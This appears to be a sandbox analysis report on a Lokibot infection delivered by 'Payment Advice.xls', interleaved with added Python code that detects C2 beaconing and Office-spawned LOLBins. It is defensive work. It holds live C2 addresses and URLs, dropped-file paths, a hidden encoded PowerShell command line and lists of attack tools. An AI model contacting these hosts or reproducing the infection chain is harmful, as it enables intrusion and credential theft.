2024-11-20T07:57:13.065121+0100 | 2024313 | 1 | Malware Command and Control Activity Detected | 192.168.2.22 | 49186 | 94.156.177.41 | 80 | TCP
2024-11-20T07:57:14.190184+0100 | 2024313 | 1 | Malware Command and Control Activity Detected | 192.168.2.22 | 49187 | 94.156.177.41 | 80 | TCP
2024-11-20T07:57:15.539350+0100 | 2024313 | 1 | Malware Command and Control Activity Detected | 192.168.2.22 | 49188 | 94.156.177.41 | 80 | TCP
2024-11-20T07:57:16.455575+0100 | 2024313 | 1 | Malware Command and Control Activity Detected | 192.168.2.22 | 49189 | 94.156.177.41 | 80 | TCP
2024-11-20T07:57:17.347428+0100 | 2024313 | 1 | Malware Command and Control Activity Detected | 192.168.2.22 | 49190 | 94.156.177.41 | 80 | TCP
2024-11-20T07:57:18.217076+0100 | 2024313 | 1 | Malware Command and Control Activity Detected | 192.168.2.22 | 49191 | 94.156.177.41 | 80 | TCP
2024-11-20T07:57:19.096338+0100 | 2024313 | 1 | Malware Command and Control Activity Detected | 192.168.2.22 | 49192 | 94.156.177.41 | 80 | TCP
2024-11-20T07:57:20.092497+0100 | 2024313 | 1 | Malware Command and Control Activity Detected | 192.168.2.22 | 49193 | 94.156.177.41 | 80 | TCP
2024-11-20T07:57:21.192076+0100 | 2024313 | 1 | Malware Command and Control Activity Detected | 192.168.2.22 | 49194 | 94.156.177.41 | 80 | TCP
2024-11-20T07:57:25.322789+0100 | 2024313 | 1 | Malware Command and Control Activity Detected | 192.168.2.22 | 49195 | 94.156.177.41 | 80 | TCP
2024-11-20T07:57:26.325588+0100 | 2024313 | 1 | Malware Command and Control Activity Detected | 192.168.2.22 | 49196 | 94.156.177.41 | 80 | TCP
2024-11-20T07:57:27.207355+0100 | 2024313 | 1 | Malware Command and Control Activity Detected | 192.168.2.22 | 49197 | 94.156.177.41 | 80 | TCP
2024-11-20T07:57:28.068992+0100 | 2024313 | 1 | Malware Command and Control Activity Detected | 192.168.2.22 | 49198 | 94.156.177.41 | 80 | TCP
2024-11-20T07:57:28.977622+0100 | 2024313 | 1 | Malware Command and Control Activity Detected | 192.168.2.22 | 49199 | 94.156.177.41 | 80 | TCP
2024-11-20T07:57:29.974567+0100 | 2024313 | 1 | Malware Command and Control Activity Detected | 192.168.2.22 | 49200 | 94.156.177.41 | 80 | TCP
2024-11-20T07:57:30.837963+0100 | 2024313 | 1 | Malware Command and Control Activity Detected | 192.168.2.22 | 49201 | 94.156.177.41 | 80 | TCP
2024-11-20T07:57:31.706612+0100 | 2024313 | 1 | Malware Command and Control Activity Detected | 192.168.2.22 | 49202 | 94.156.177.41 | 80 | TCP
2024-11-20T07:57:32.784000+0100 | 2024313 | 1 | Malware Command and Control Activity Detected | 192.168.2.22 | 49203 | 94.156.177.41 | 80 | TCP
2024-11-20T07:57:33.768266+0100 | 2024313 | 1 | Malware Command and Control Activity Detected | 192.168.2.22 | 49204 | 94.156.177.41 | 80 | TCP
2024-11-20T07:57:34.637117+0100 | 2024313 | 1 | Malware Command and Control Activity Detected | 192.168.2.22 | 49205 | 94.156.177.41 | 80 | TCP
2024-11-20T07:57:35.506502+0100 | 2024313 | 1 | Malware Command and Control Activity Detected | 192.168.2.22 | 49206 | 94.156.177.41 | 80 | TCP
2024-11-20T07:57:36.385030+0100 | 2024313 | 1 | Malware Command and Control Activity Detected | 192.168.2.22 | 49207 | 94.156.177.41 | 80 | TCP
2024-11-20T07:57:37.244067+0100 | 2024313 | 1 | Malware Command and Control Activity Detected | 192.168.2.22 | 49208 | 94.156.177.41 | 80 | TCP
2024-11-20T07:57:38.096012+0100 | 2024313 | 1 | Malware Command and Control Activity Detected | 192.168.2.22 | 49209 | 94.156.177.41 | 80 | TCP
2024-11-20T07:57:38.955955+0100 | 2024313 | 1 | Malware Command and Control Activity Detected | 192.168.2.22 | 49210 | 94.156.177.41 | 80 | TCP
2024-11-20T07:57:39.954333+0100 | 2024313 | 1 | Malware Command and Control Activity Detected | 192.168.2.22 | 49211 | 94.156.177.41 | 80 | TCP
2024-11-20T07:57:40.816303+0100 | 2024313 | 1 | Malware Command and Control Activity Detected | 192.168.2.22 | 49212 | 94.156.177.41 | 80 | TCP
2024-11-20T07:57:41.675988+0100 | 2024313 | 1 | Malware Command and Control Activity Detected | 192.168.2.22 | 49213 | 94.156.177.41 | 80 | TCP
2024-11-20T07:57:42.543644+0100 | 2024313 | 1 | Malware Command and Control Activity Detected | 192.168.2.22 | 49214 | 94.156.177.41 | 80 | TCP
2024-11-20T07:57:43.545186+0100 | 2024313 | 1 | Malware Command and Control Activity Detected | 192.168.2.22 | 49215 | 94.156.177.41 | 80 | TCP
2024-11-20T07:57:44.541694+0100 | 2024313 | 1 | Malware Command and Control Activity Detected | 192.168.2.22 | 49216 | 94.156.177.41 | 80 | TCP
2024-11-20T07:57:45.533689+0100 | 2024313 | 1 | Malware Command and Control Activity Detected | 192.168.2.22 | 49217 | 94.156.177.41 | 80 | TCP
2024-11-20T07:57:46.392082+0100 | 2024313 | 1 | Malware Command and Control Activity Detected | 192.168.2.22 | 49218 | 94.156.177.41 | 80 | TCP
2024-11-20T07:57:47.435298+0100 | 2024313 | 1 | Malware Command and Control Activity Detected | 192.168.2.22 | 49219 | 94.156.177.41 | 80 | TCP
2024-11-20T07:57:48.350376+0100 | 2024313 | 1 | Malware Command and Control Activity Detected | 192.168.2.22 | 49220 | 94.156.177.41 | 80 | TCP
2024-11-20T07:57:49.387296+0100 | 2024313 | 1 | Malware Command and Control Activity Detected | 192.168.2.22 | 49221 | 94.156.177.41 | 80 | TCP
2024-11-20T07:57:50.396869+0100 | 2024313 | 1 | Malware Command and Control Activity Detected | 192.168.2.22 | 49222 | 94.156.177.41 | 80 | TCP
2024-11-20T07:57:51.400249+0100 | 2024313 | 1 | Malware Command and Control Activity Detected | 192.168.2.22 | 49223 | 94.156.177.41 | 80 | TCP
2024-11-20T07:57:52.414699+0100 | 2024313 | 1 | Malware Command and Control Activity Detected | 192.168.2.22 | 49224 | 94.156.177.41 | 80 | TCP
2024-11-20T07:57:53.412939+0100 | 2024313 | 1 | Malware Command and Control Activity Detected | 192.168.2.22 | 49225 | 94.156.177.41 | 80 | TCP
2024-11-20T07:57:54.297505+0100 | 2024313 | 1 | Malware Command and Control Activity Detected | 192.168.2.22 | 49226 | 94.156.177.41 | 80 | TCP
2024-11-20T07:57:55.163739+0100 | 2024313 | 1 | Malware Command and Control Activity Detected | 192.168.2.22 | 49227 | 94.156.177.41 | 80 | TCP
2024-11-20T07:57:56.037599+0100 | 2024313 | 1 | Malware Command and Control Activity Detected | 192.168.2.22 | 49228 | 94.156.177.41 | 80 | TCP
2024-11-20T07:57:56.912319+0100 | 2024313 | 1 | Malware Command and Control Activity Detected | 192.168.2.22 | 49229 | 94.156.177.41 | 80 | TCP
2024-11-20T07:57:57.913305+0100 | 2024313 | 1 | Malware Command and Control Activity Detected | 192.168.2.22 | 49230 | 94.156.177.41 | 80 | TCP
2024-11-20T07:57:58.907092+0100 | 2024313 | 1 | Malware Command and Control Activity Detected | 192.168.2.22 | 49231 | 94.156.177.41 | 80 | TCP
2024-11-20T07:58:00.178852+0100 | 2024313 | 1 | Malware Command and Control Activity Detected | 192.168.2.22 | 49232 | 94.156.177.41 | 80 | TCP
2024-11-20T07:58:01.249409+0100 | 2024313 | 1 | Malware Command and Control Activity Detected | 192.168.2.22 | 49233 | 94.156.177.41 | 80 | TCP
2024-11-20T07:58:02.252446+0100 | 2024313 | 1 | Malware Command and Control Activity Detected | 192.168.2.22 | 49234 | 94.156.177.41 | 80 | TCP
2024-11-20T07:58:03.143133+0100 | 2024313 | 1 | Malware Command and Control Activity Detected | 192.168.2.22 | 49235 | 94.156.177.41 | 80 | TCP
2024-11-20T07:58:04.012582+0100 | 2024313 | 1 | Malware Command and Control Activity Detected | 192.168.2.22 | 49236 | 94.156.177.41 | 80 | TCP
2024-11-20T07:58:05.015654+0100 | 2024313 | 1 | Malware Command and Control Activity Detected | 192.168.2.22 | 49237 | 94.156.177.41 | 80 | TCP
2024-11-20T07:58:05.888261+0100 | 2024313 | 1 | Malware Command and Control Activity Detected | 192.168.2.22 | 49238 | 94.156.177.41 | 80 | TCP
2024-11-20T07:58:06.878837+0100 | 2024313 | 1 | Malware Command and Control Activity Detected | 192.168.2.22 | 49239 | 94.156.177.41 | 80 | TCP
2024-11-20T07:58:07.903785+0100 | 2024313 | 1 | Malware Command and Control Activity Detected | 192.168.2.22 | 49240 | 94.156.177.41 | 80 | TCP
2024-11-20T07:58:08.914515+0100 | 2024313 | 1 | Malware Command and Control Activity Detected | 192.168.2.22 | 49241 | 94.156.177.41 | 80 | TCP
2024-11-20T07:58:09.790944+0100 | 2024313 | 1 | Malware Command and Control Activity Detected | 192.168.2.22 | 49242 | 94.156.177.41 | 80 | TCP
2024-11-20T07:58:10.690343+0100 | 2024313 | 1 | Malware Command and Control Activity Detected | 192.168.2.22 | 49243 | 94.156.177.41 | 80 | TCP
2024-11-20T07:58:11.687264+0100 | 2024313 | 1 | Malware Command and Control Activity Detected | 192.168.2.22 | 49244 | 94.156.177.41 | 80 | TCP
2024-11-20T07:58:12.561533+0100 | 2024313 | 1 | Malware Command and Control Activity Detected | 192.168.2.22 | 49245 | 94.156.177.41 | 80 | TCP
2024-11-20T07:58:13.441956+0100 | 2024313 | 1 | Malware Command and Control Activity Detected | 192.168.2.22 | 49246 | 94.156.177.41 | 80 | TCP
2024-11-20T07:58:14.313214+0100 | 2024313 | 1 | Malware Command and Control Activity Detected | 192.168.2.22 | 49247 | 94.156.177.41 | 80 | TCP
2024-11-20T07:58:15.160454+0100 | 2024313 | 1 | Malware Command and Control Activity Detected | 192.168.2.22 | 49248 | 94.156.177.41 | 80 | TCP
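The alert tables above are the raw evidence behind the C2 verdict; what a practitioner reads off them is the cadence: a fresh TCP connection from 192.168.2.22 to 94.156.177.41:80 roughly every second, several rules firing on each connection, for the whole run. The following Python is an added example, not code from the Joe Sandbox report or from Suricata, that measures that cadence from structured alert records: it groups alerts by remote host regardless of which direction the rule fired in, collapses the several alerts on one connection into one flow, and reports inter-connection interval, jitter and the SIDs seen. The record list is a constructed excerpt (twelve rows from the SID 2025381 table, two from the SID 2024313 table and the two inbound SID 2024197 rows); the beacon thresholds are assumptions made here, not taken from any rule set.

```python
import ipaddress
from collections import defaultdict
from datetime import datetime
from statistics import mean, median, pstdev
from typing import Dict, List, NamedTuple, Tuple


class Alert(NamedTuple):
    ts: datetime
    sid: int
    severity: int
    classtype: str
    src_ip: str
    src_port: int
    dst_ip: str
    dst_port: int
    proto: str


def parse_alert(row: tuple) -> Alert:
    """Typed record from one table row (timestamp, SID, severity, classtype,
    source IP, source port, destination IP, destination port, protocol)."""
    ts, sid, sev, cls, sip, sport, dip, dport, proto = row
    # The report writes offsets as +0100 with no colon, which %z accepts.
    return Alert(datetime.strptime(ts, "%Y-%m-%dT%H:%M:%S.%f%z"), int(sid),
                 int(sev), cls, sip, int(sport), dip, int(dport), proto)


def remote_side(a: Alert) -> Tuple[str, int, int]:
    """(remote IP, remote port, local port), whichever direction the rule fired in."""
    if ipaddress.ip_address(a.src_ip).is_private and not ipaddress.ip_address(a.dst_ip).is_private:
        return a.dst_ip, a.dst_port, a.src_port
    return a.src_ip, a.src_port, a.dst_port


def summarize(alerts: List[Alert], min_flows: int = 8, max_jitter: float = 0.5) -> Dict[str, dict]:
    """Per remote host: flow count, rule SIDs, inter-connection cadence and a
    beacon verdict. The thresholds are assumed values, not from any rule set."""
    by_remote: Dict[str, List[Alert]] = defaultdict(list)
    for a in alerts:
        by_remote[remote_side(a)[0]].append(a)
    out: Dict[str, dict] = {}
    for remote, items in by_remote.items():
        # One TCP connection (one local ephemeral port) is one flow; several
        # rules fire per flow, so cadence is measured on the first alert per flow.
        first_seen: Dict[int, datetime] = {}
        for a in items:
            local_port = remote_side(a)[2]
            if local_port not in first_seen or a.ts < first_seen[local_port]:
                first_seen[local_port] = a.ts
        times = sorted(first_seen.values())
        gaps = [(t1 - t0).total_seconds() for t0, t1 in zip(times, times[1:])]
        # Jitter as coefficient of variation: a fixed sleep gives a small value.
        jitter = pstdev(gaps) / mean(gaps) if len(gaps) > 1 else None
        out[remote] = {
            "flows": len(times),
            "alerts": len(items),
            "sids": sorted({a.sid for a in items}),
            "median_interval": median(gaps) if gaps else None,
            "jitter": jitter,
            "beacon": len(times) >= min_flows and jitter is not None and jitter < max_jitter,
        }
    return out


C2 = "Malware Command and Control Activity Detected"
TROJAN = "A Network Trojan was detected"
# Constructed excerpt of the tables above: twelve SID 2025381 rows, two SID
# 2024313 rows on flows already counted (they must not inflate the flow
# count), and the two inbound SID 2024197 rows from 192.3.243.136.
ROWS = [
    ("2024-11-20T07:57:00.038068+0100", 2025381, 1, C2, "192.168.2.22", 49170, "94.156.177.41", 80, "TCP"),
    ("2024-11-20T07:57:00.985981+0100", 2025381, 1, C2, "192.168.2.22", 49171, "94.156.177.41", 80, "TCP"),
    ("2024-11-20T07:57:01.990103+0100", 2025381, 1, C2, "192.168.2.22", 49172, "94.156.177.41", 80, "TCP"),
    ("2024-11-20T07:57:03.028263+0100", 2025381, 1, C2, "192.168.2.22", 49173, "94.156.177.41", 80, "TCP"),
    ("2024-11-20T07:57:04.458084+0100", 2025381, 1, C2, "192.168.2.22", 49174, "94.156.177.41", 80, "TCP"),
    ("2024-11-20T07:57:05.513581+0100", 2025381, 1, C2, "192.168.2.22", 49176, "94.156.177.41", 80, "TCP"),
    ("2024-11-20T07:57:07.053237+0100", 2025381, 1, C2, "192.168.2.22", 49177, "94.156.177.41", 80, "TCP"),
    ("2024-11-20T07:57:08.400152+0100", 2025381, 1, C2, "192.168.2.22", 49178, "94.156.177.41", 80, "TCP"),
    ("2024-11-20T07:57:09.288353+0100", 2025381, 1, C2, "192.168.2.22", 49182, "94.156.177.41", 80, "TCP"),
    ("2024-11-20T07:57:10.533829+0100", 2025381, 1, C2, "192.168.2.22", 49183, "94.156.177.41", 80, "TCP"),
    ("2024-11-20T07:57:11.427592+0100", 2025381, 1, C2, "192.168.2.22", 49185, "94.156.177.41", 80, "TCP"),
    ("2024-11-20T07:57:12.359101+0100", 2025381, 1, C2, "192.168.2.22", 49186, "94.156.177.41", 80, "TCP"),
    ("2024-11-20T07:57:00.796820+0100", 2024313, 1, C2, "192.168.2.22", 49170, "94.156.177.41", 80, "TCP"),
    ("2024-11-20T07:57:01.712250+0100", 2024313, 1, C2, "192.168.2.22", 49171, "94.156.177.41", 80, "TCP"),
    ("2024-11-20T07:56:32.963009+0100", 2024197, 1, TROJAN, "192.3.243.136", 80, "192.168.2.22", 49164, "TCP"),
    ("2024-11-20T07:56:35.880037+0100", 2024197, 1, TROJAN, "192.3.243.136", 80, "192.168.2.22", 49166, "TCP"),
]

if __name__ == "__main__":
    for host, s in summarize([parse_alert(r) for r in ROWS]).items():
        print(host, s)
```

Keying the cadence on connections rather than on alerts matters here: three or four rules fire on every request, so counting alerts would report a beacon interval a quarter of the real one. The two-alert host 192.3.243.136 is left unclassified by design; cadence says nothing about a host contacted twice.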
                    Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol


                    AV Detection

                    Source: Payment Advice.xls | Avira: detected
                    Source: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe | Avira: detection malicious, Label: HEUR/AGEN.1306899
                    Source: C:\Users\user\AppData\Local\Temp\~DF6CCF4596F2406470.TMP | Avira: detection malicious, Label: TR/AVI.Agent.xoswb
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\caspol[1].exe | Avira: detection malicious, Label: HEUR/AGEN.1306899
                    Source: C:\Users\user\AppData\Roaming\caspol.exe | Avira: detection malicious, Label: HEUR/AGEN.1306899
                    Source: 00000025.00000002.532965241.00000000025D3000.00000004.00000800.00020000.00000000.sdmp | Malware Configuration Extractor: Lokibot {"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "94.156.177.41/simple/five/fre.php"]}
                    Source: Payment Advice.xls | ReversingLabs: Detection: 21%
                    Source: Payment Advice.xls | Virustotal: Detection: 25%
                    Source: C:\Users\user\AppData\Roaming\rrwscqkDSNwLK.exe | Joe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\caspol[1].exe | Joe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Roaming\caspol.exe | Joe Sandbox ML: detected
                    Source: Payment Advice.xls | Joe Sandbox ML: detected

                    Phishing

                    Source: Yara match | File source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\greetingwithgreatthignsgivenbackwithentireprocessgivenmeback[1].hta, type: DROPPED
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
                    Source: unknown | HTTPS traffic detected: 198.244.140.41:443 -> 192.168.2.22:49163 version: TLS 1.2
                    Source: unknown | HTTPS traffic detected: 198.244.140.41:443 -> 192.168.2.22:49165 version: TLS 1.2
                    Source: unknown | HTTPS traffic detected: 198.244.140.41:443 -> 192.168.2.22:49180 version: TLS 1.2
                    Source: unknown | HTTPS traffic detected: 198.244.140.41:443 -> 192.168.2.22:49179 version: TLS 1.2
                    Source: Binary string: 7C:\Users\user\AppData\Local\Temp\i4ik0bio\i4ik0bio.pdbhP source: powershell.exe, 00000005.00000002.454706317.00000000025C3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: 7C:\Users\user\AppData\Local\Temp\zpwvvpvf\zpwvvpvf.pdb source: powershell.exe, 0000001F.00000002.519043845.000000000238B000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: 7C:\Users\user\AppData\Local\Temp\zpwvvpvf\zpwvvpvf.pdbhP source: powershell.exe, 0000001F.00000002.519043845.000000000238B000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: 7C:\Users\user\AppData\Local\Temp\i4ik0bio\i4ik0bio.pdb source: powershell.exe, 00000005.00000002.454706317.00000000025C3000.00000004.00000800.00020000.00000000.sdmp
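Taken together, the Phishing findings (an .hta dropped into Temporary Internet Files, PowerShell compiling code from a random Temp directory) and the Software Vulnerabilities finding below (EXCEL.EXE creating mshta.exe) describe a process lineage, and lineage is what a detection should key on: mshta.exe or powershell.exe under an Office parent, and a PE running from AppData\Roaming anywhere in that tree. The following Python is an added example, not part of the Joe Sandbox report, that walks a set of process-creation events and emits those two findings. The image paths are the ones this report lists; the PIDs, parent links and command lines are constructed for illustration and are not taken from the report.

```python
"""Flag Office-spawned LOLBins and execution from user-writable paths by
walking a process tree (added example, not report code)."""
from collections import namedtuple
from pathlib import PureWindowsPath

Proc = namedtuple("Proc", "pid ppid image cmdline")

OFFICE_APPS = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe"}
LOLBINS = {"mshta.exe", "powershell.exe", "wscript.exe", "cscript.exe",
           "cmd.exe", "rundll32.exe", "regsvr32.exe", "certutil.exe"}
# Path fragments a signed installer does not write to; a PE running from here
# under an Office lineage is the "Microsoft Office drops suspicious files" case.
USER_WRITABLE = ("\\appdata\\roaming\\", "\\appdata\\local\\temp\\", "\\users\\public\\")

# Dropped-file path listed in the report's Phishing section.
HTA = (r"C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files"
       r"\Content.IE5\T4O403JZ\greetingwithgreatthignsgivenbackwithentireprocessgivenmeback[1].hta")

# Constructed process-creation events. Image paths are the ones the report
# lists; PIDs, parent links and command lines are assumed for illustration.
EVENTS = [
    Proc(50, 1, r"C:\Windows\explorer.exe", "explorer.exe"),
    Proc(100, 50, r"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE",
         r'"EXCEL.EXE" "C:\Users\user\Desktop\Payment Advice.xls"'),
    Proc(200, 100, r"C:\Windows\System32\mshta.exe", f'mshta.exe "{HTA}"'),
    Proc(300, 200, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
         "powershell.exe -NoP -W Hidden -Enc <base64 omitted>"),
    Proc(400, 300, r"C:\Users\user\AppData\Roaming\caspol.exe", "caspol.exe"),
    Proc(500, 50, r"C:\Program Files\Google\Chrome\Application\chrome.exe", "chrome.exe"),
    Proc(600, 50, r"C:\Windows\System32\cmd.exe", "cmd.exe /c dir"),
]


def ancestry(pid, index):
    """Image basenames from the process up to the root. The seen-set stops
    the walk if PID reuse ever produces a cycle in the parent links."""
    chain, seen = [], set()
    while pid in index and pid not in seen:
        seen.add(pid)
        proc = index[pid]
        chain.append(PureWindowsPath(proc.image).name.lower())
        pid = proc.ppid
    return chain


def detect(events):
    """Return (pid, rule, lineage) findings for every event whose ancestry
    contains an Office application. cmd.exe launched from Explorer is a
    LOLBin too, but without an Office ancestor it is not reported."""
    index = {p.pid: p for p in events}
    findings = []
    for proc in events:
        chain = ancestry(proc.pid, index)
        me, ancestors = chain[0], chain[1:]
        if not OFFICE_APPS.intersection(ancestors):
            continue
        lineage = " <- ".join(chain)
        if me in LOLBINS:
            findings.append((proc.pid, "office_spawned_lolbin", lineage))
        if any(frag in proc.image.lower() for frag in USER_WRITABLE):
            findings.append((proc.pid, "exec_from_user_writable_under_office", lineage))
    return findings


if __name__ == "__main__":
    for pid, rule, lineage in detect(EVENTS):
        print(f"{pid:>5} {rule:40} {lineage}")
```

Walking the full ancestry rather than checking only the immediate parent is what makes the third finding possible: caspol.exe is three hops below EXCEL.EXE, so a parent-only rule would miss it.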

                    Software Vulnerabilities

                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\mshta.exe
                    Source: global traffic DNS query: name: provit.uk
                    Source: global traffic TCP traffic: 192.168.2.22:49163 -> 198.244.140.41:443
                    Source: global traffic TCP traffic: 192.168.2.22:49165 -> 198.244.140.41:443
                    Source: global traffic TCP traffic: 192.168.2.22:49175 -> 198.244.140.41:443
                    Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.244.140.41:443
                    Source: global traffic TCP traffic: 192.168.2.22:49164 -> 192.3.243.136:80
                    Source: global traffic TCP traffic: 192.168.2.22:49166 -> 192.3.243.136:80
                    Source: global traffic TCP traffic: 192.168.2.22:49167 -> 192.3.243.136:80
                    Source: global traffic TCP traffic: 192.168.2.22:49184 -> 192.3.243.136:80
                    Source: global traffic TCP traffic: 192.168.2.22:49180 -> 198.244.140.41:443
                    Source: global traffic TCP traffic: 198.244.140.41:443 -> 192.168.2.22:49163
                    Source: global traffic TCP traffic: 192.3.243.136:80 -> 192.168.2.22:49164
                    Source: global traffic TCP traffic: 198.244.140.41:443 -> 192.168.2.22:49165
                    Source: global traffic TCP traffic: 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.243.136:80
                    Source: global trafficTCP traffic: 192.3.243.136:80 -> 192.168.2.22:49166
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.243.136:80
